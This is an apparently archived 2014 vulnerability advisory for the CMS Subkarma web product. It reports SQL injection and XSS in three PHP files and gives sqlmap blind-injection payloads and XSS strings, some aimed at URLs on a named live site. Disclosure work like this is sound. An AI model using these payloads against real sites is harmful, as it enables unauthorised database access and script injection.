CMS Subkarma Cross Site Scripting / SQL Injection

2014.10.14

Credit: Renzi

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79
CWE-89

# Multiple SQL Injection & XSS on CMS SUBKARMA
# Risk: High
# CWE number: CWE-89,CWE-79
# Date: 13/10/2014
# Vendor: www.jttel.com.tw
# Author: Felipe " Renzi " Gabriel
# Contact: renzi@linuxmail.org
# Tested on: Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906
# Vulnerables File: news.php ; product.php ; pro_con.php
# Exploits: http://www.target.com/news.php?id=[XSS]
http://www.target.com/product.php?cat_id=[SQLI] & [XSS]
http://www.target.com/pro_con.php?id=[SQLI] & [XSS]
# PoC: http://www.cideko.com/product.php?cat_id=18
http://www.cideko.com/pro_con.php?id=3
--- "SQLI using SQLMAP."---
Place: GET
Parameter: cat_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat_id=18 AND 6427=6427
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: cat_id=18 AND 7867=BENCHMARK(5000000,MD5(0x4d666b6e))
---
--- " XSS using HTML injection."---
http://www.cideko.com/news.php?id=38"><marquee>XSS</marquee>
http://www.cideko.com/product.php?cat_id=18"><marquee>XSS</marquee>
http://www.cideko.com/pro_con.php?id=3"><marquee>XSS</marquee>
# Note
The SQL Injection on file pro_con.php parameter id, was published by Ali Pandidan.
Reference, http://cxsecurity.com/issue/WLB-2011020004 .
# Thank's

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}